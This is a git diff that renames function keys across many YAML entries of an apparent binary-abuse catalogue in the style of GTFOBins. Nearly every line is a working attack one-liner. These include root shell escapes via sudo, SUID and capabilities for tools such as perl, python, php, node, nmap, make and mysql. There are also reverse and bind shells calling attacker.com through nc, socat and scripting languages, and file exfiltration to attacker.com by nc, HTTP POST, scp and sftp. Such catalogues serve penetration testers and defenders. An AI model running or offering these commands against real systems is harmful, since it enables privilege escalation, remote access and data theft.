file-upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -41,7 +41,7 @@ functions:
|
||||
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
|
||||
t:send(d);
|
||||
t:close();'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
|
||||
code: |
|
||||
@ -59,8 +59,8 @@ functions:
|
||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
||||
file-read:
|
||||
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo lua -e 'os.execute("/bin/sh")'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./lua -e 'os.execute("/bin/sh")'
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
@ -10,11 +10,11 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,DATA)" .
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
|
@ -1,16 +1,16 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: man file_to_read
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: more file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./more file_to_read
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||
code: |
|
||||
sudo mount -o bind /bin/sh /bin/mount
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo "DATA" > $TF
|
||||
./mv $TF $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
|
@ -1,10 +1,10 @@
|
||||
---
|
||||
description: A valid MySQL server must be available.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: mysql -e '\! /bin/sh'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo mysql -e '\! /bin/sh'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./mysql -e '\! /bin/sh'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
@ -14,14 +14,14 @@ functions:
|
||||
^O
|
||||
file-read:
|
||||
- code: nano file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh -p' > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
|
@ -1,36 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell-interactive:
|
||||
bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
sudo nc -e /bin/sh $RHOST $RPORT
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: nice /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./nice /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo nice /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
nmap --script=$TF
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -21,7 +21,7 @@ functions:
|
||||
end;
|
||||
f:close();t:close();' > $TF
|
||||
nmap --script=$TF
|
||||
bind-shell-non-interactive:
|
||||
non-interactive-bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -34,7 +34,7 @@ functions:
|
||||
local b=assert(f:read("*a"));c:send(b);
|
||||
end;c:close();f:close();' > $TF
|
||||
nmap --script=$TF
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -50,7 +50,7 @@ functions:
|
||||
t:send(d);
|
||||
t:close();' > $TF
|
||||
nmap --script=$TF
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
@ -76,13 +76,13 @@ functions:
|
||||
TF=$(mktemp)
|
||||
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
||||
nmap --script=$TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
sudo nmap --script=$TF
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -14,7 +14,7 @@ functions:
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
bind-shell-interactive:
|
||||
bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -24,13 +24,13 @@ functions:
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: |
|
||||
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
pg /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: pg file_to_read
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo pg /etc/profile
|
||||
!/bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./pg file_to_read
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
@ -16,37 +16,37 @@ functions:
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "posix_setuid(0); system('$CMD');"
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
@ -14,14 +14,14 @@ functions:
|
||||
^O
|
||||
file-read:
|
||||
- code: pico file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh -p' > $TF
|
||||
chmod +x $TF
|
||||
./pico -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec sh' > $TF
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
pip install $TF
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -16,7 +16,7 @@ functions:
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")' > $TF/setup.py
|
||||
pip install $TF
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -36,7 +36,7 @@ functions:
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
||||
pip install $TF
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -60,12 +60,12 @@ functions:
|
||||
TF=$(mktemp -d)
|
||||
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
|
||||
pip install $TF
|
||||
load-library:
|
||||
library-load:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
||||
pip install $TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
||||
file-write:
|
||||
@ -13,7 +13,7 @@ functions:
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
puppet filebucket -l diff /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
description: The payloads are compatible with both Python version 2 and 3.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: python -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -12,7 +12,7 @@ functions:
|
||||
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -28,7 +28,7 @@ functions:
|
||||
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -41,12 +41,12 @@ functions:
|
||||
- code: python -c 'open("file_to_write","w+").write("DATA")'
|
||||
file-read:
|
||||
- code: python -c 'print(open("file_to_read").read())'
|
||||
load-library:
|
||||
library-load:
|
||||
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||
---
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rlwrap /bin/sh
|
||||
file-write:
|
||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
rlwrap -l "$LFILE" echo DATA
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rlwrap /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||
---
|
||||
|
@ -1,19 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -25,10 +25,10 @@ functions:
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
|
||||
file-read:
|
||||
- code: ruby -e 'puts File.read("file_to_read")'
|
||||
load-library:
|
||||
library-load:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
|
||||
---
|
||||
|
@ -1,30 +1,30 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'sh 0<&2 1>&2' > $TF
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_get
|
||||
LFILE=file_to_save
|
||||
scp $RPATH $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'sh 0<&2 1>&2' > $TF
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'sh 0<&2 1>&2' > $TF
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sed -n '1e exec sh 1>&0' /etc/hosts
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- description: GNU version only.
|
||||
code: sed -n "1e id" /etc/hosts
|
||||
file-write:
|
||||
@ -14,11 +14,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sed '' "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sed -e '' "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo setarch $(arch) /bin/sh
|
||||
---
|
||||
|
@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sftp $HOST
|
||||
!/bin/sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
put file_to_send file_to_save
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
get file_to_get file_to_save
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sudo sftp $HOST
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
shuf -e DATA -o "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
./shuf -e DATA -o "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sudo shuf -e DATA -o "$LFILE"
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: A valid SMB/CIFS server must be available.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
smbclient \\ip\share
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo smbclient \\ip\share
|
||||
!/bin/sh
|
||||
|
@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
bind-shell-interactive:
|
||||
bind-shell:
|
||||
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sort -m "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sort -m "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo sort -m "$LFILE"
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
